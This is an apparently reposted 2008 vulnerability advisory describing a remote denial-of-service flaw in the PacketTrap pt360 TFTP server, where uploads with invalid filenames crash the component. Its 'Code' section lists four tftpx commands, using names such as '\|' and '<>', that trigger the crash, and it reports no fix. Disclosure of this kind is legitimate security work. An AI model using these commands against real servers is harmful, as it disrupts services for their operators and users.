Denial of Service in PacketTrap TFTP server 2.0.3901.0

2008.03.12
Risk: Low
Local: Yes
Remote: Yes
CWE: CWE-20


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

####################################################################### Luigi Auriemma Application: pt360 Tool Suite PRO http://www.packettrap.com/product/index.aspx Versions: <= 2.0.3901.0 Platforms: Windows Bug: Denial of Service of the TFTP server Exploitation: remote Date: 08 Mar 2008 Author: Luigi Auriemma e-mail: aluigi (at) autistici (dot) org [email concealed] web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== pt360 is a suite of network tools. ####################################################################### ====== 2) Bug ====== The TFTP server implemented in the pt360 suite can be easily interrupted through the uploading of files with invalid names, in this case is raised an exception which blocks the TFTP component and forces the user to restart the whole application for re-running it. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/tftpx.zip tftpx -u SERVER "\|" none tftpx -u SERVER "\"" none tftpx -u SERVER "<>" none tftpx -u -f SERVER 200 none ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top